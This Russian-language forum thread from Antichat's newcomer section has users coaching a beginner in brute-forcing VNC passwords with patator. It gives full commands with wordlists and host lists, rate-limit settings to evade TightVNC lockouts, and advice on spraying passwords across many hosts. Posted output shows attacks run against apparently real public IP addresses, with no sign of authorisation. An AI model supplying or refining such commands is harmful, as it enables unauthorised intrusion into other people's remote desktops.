Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   pratator -помогите новичку (https://forum.antichat.xyz/showthread.php?t=449106)

lok888 10.03.2017 18:16

прочел что pratator который идет в комплекте кали линукс брутит vnc.

помогите с командами пожалуйста: как осуществить брут ip:8000 c помощью patator?

billybonse 11.03.2017 13:24

patator. Пример:

patator vnc_login host=10.0.0.1 password=FILE0 0=passwords.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries -1 -x quit:code=0

lok888 11.03.2017 15:03

Цитата:

Сообщение от billybonse
billybonse said:

patator. Пример:
patator vnc_login host=10.0.0.1 password=FILE0 0=passwords.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries -1 -x quit:code=0

Да, я нашел такой пример но что-то не так сделал. Нужно ли заменять переменные кроме passwords.txt еще какие-то?

добавил впередт patator, вроде запустился )) подожду результата

прошло пол часа и ... ничего...

вот так такую команду ввел:

patator vnc_login host=116.58.241.185 password=FILE0 0='/root/Рабочий стол/password.txt' -t 1 -x retry:fgrep!='Authentication failure' --max-retries -1 -x quit:code=0

такой результат:

Код:

Code:
patator vnc_login host=101.2.1.01 password=FILE0 0='/root/Рабочий стол/password.txt' -t 1 -x retry:fgrep!='Authentication failure' --max-retries -1 -x quit:code=0
21:03:54 patator    INFO - Starting Patator v0.6 (http://code.google.com/p/patator/) at 2017-03-11 21:03 VLAT
21:03:54 patator    INFO -                                                                           
21:03:54 patator    INFO - code  size  time | candidate                          |  num | mesg
21:03:54 patator    INFO - -----------------------------------------------------------------------------

21:26:36 patator    INFO - Progress:  0% (0/91) | Speed: 1 r/s | ETC: 21:28:07 (00:01:31 remaining)

22:23:20 patator    INFO - Progress:  0% (0/91) | Speed: 1 r/s | ETC: 22:24:51 (00:01:31 remaining)
^C22:23:41 patator    INFO - Hits/Done/Skip/Fail/Size: 0/0/0/0/91, Avg: 0 r/s, Time: 1h 19m 46s
22:23:41 patator    INFO - To resume execution, pass --resume 0

не подскажете что значит ? )) и почему полтора часа думал а прогресс 0% ?

Zayac 13.03.2017 11:30

А где коды ошибок ответы сервера? по них сразу видно в чем дело..

Не совсем я разобрался зачем это retry при ошибке 'Authentication failure' пароль не подошел иpatator все-ровно будет пробовать следующий из словаря..

--max-retries тоже не совсем понятно что за полезная нагрузка если после 4 попыток по умолчанию спокойно перебирает пароль дальше...

запускаю брут так:

Код:

Code:
patator vnc_login host=FILE1 1=host.txt password=FILE0 0=pass.txt -t 1 --rate-limit=3 -x ignore:code=1 -l out

при ошибке Session setup failed: "Your connection has been rejected нужно увеличивать --rate-limit задержку отправки пароля.. для обычного TightVNC 3sec - other 14-15sec.....

Еще бы кто подсказал как сделать чтоб при code=0 Ok хост удалялся или как-то пропускался из брута(пробивал action free вываливается с ошибкой после кода 0). и это все хосты с ответами FAIL code xxx тоже б если на автомате удалялись из списка было б супер.

lok888 13.03.2017 12:12

Цитата:

Сообщение от Zayac
Zayac said:

А где коды ошибок ответы сервера? по них сразу видно в чем дело..
Не совсем я разобрался зачем это
retry
при ошибке 'Authentication failure' пароль не подошел и
patator
все-ровно будет пробовать следующий из словаря..
--max-retries
тоже не совсем понятно что за полезная нагрузка если после 4 попыток по умолчанию спокойно перебирает пароль дальше...
запускаю брут так:
Код:

Code:
patator vnc_login host=FILE1 1=host.txt password=FILE0 0=pass.txt -t 1 --rate-limit=3 -x ignore:code=1 -l out

при ошибке Session setup failed: "Your connection has been rejected нужно увеличивать --rate-limit задержку отправки пароля.. для обычного TightVNC 3sec - other 14-15sec.....
Еще бы кто подсказал как сделать чтоб при
code=0
Ok хост удалялся или как-то пропускался из брута(пробивал action free вываливается с ошибкой после кода 0). и это все хосты с ответами FAIL code xxx тоже б если на автомате удалялись из списка было б супер.

Спасибо, так попробую.

Я слвсем новичек -еще не знаю что в patatore означают какие команды(

Zayac 13.03.2017 12:21

если указать наоборот для хоста 0 а password 1 то вначале все пароли с словаря будут подбиратся к 1 хосту далее 2 и т. д. а так по паролю на каждый хост c файла host.txt

-l out -- сохраняет логи брута в папку out

lok888 13.03.2017 14:59

Цитата:

Сообщение от Zayac
Zayac said:

patator vnc_login host=FILE1 1=host.txt password=FILE0 0=pass.txt -t 1 --rate-limit=3 -x ignore:code=1 -l out
t

запустил брут с вашей командой. пока такой вот результат:

Код:

Code:
patator vnc_login host=FILE1 1='/root/Рабочий стол/hosts' password=FILE0 0='/root/Рабочий стол/password.txt' -t 1 --rate-limit=3 -x ignore:code=1 -l out
Directory '/root/out' is not empty, do you want to wipe it ? [Y/n]: y
20:26:37 patator    INFO - Starting Patator v0.6 (http://code.google.com/p/patator/) at 2017-03-13 20:26 VLAT
20:26:37 patator    INFO -                                                                           
20:26:37 patator    INFO - code  size  time | candidate                          |  num | mesg
20:33:50 patator    FAIL - xxx  50    0.000 | admin:145.24.321.111              |    9 |  (111, 'Connection refused')
20:35:00 patator    FAIL - xxx  39    0.000 | admin:145.24.321.111              |    10 |  ('timed out',)
20:35:30 patator    FAIL - xxx  50    0.000 | admin123:145.24.321.111            |    11 |  (111, 'Connection refused')
20:36:40 patator    FAIL - xxx  39    0.000 | admin123:145.24.321.111            |    12 |  ('timed out',)


Zayac 13.03.2017 16:49

Хост неотвечает -- нет связи.. Откуда вообще такой IP 145.24.321 что за 321 ?? максимум 254

lok888 13.03.2017 18:04

Цитата:

Сообщение от Zayac
Zayac said:

Хост неотвечает -- нет связи.. Откуда вообще такой IP 145.24.321 что за 321 ?? максимум 254

знаю.)) наобум натыкал цифр, чтоб не показывать всем сканируемый IP.

не отвечает - значит никак в него не "прорваться" ?

или на нем вообще нет vnc ?

просто nmap показал что удаленный рабочий стол есть на нем порт 3389. или я путаю понятия ?

Zayac 13.03.2017 21:17

вообще нет vnc порт 5900


Время: 01:35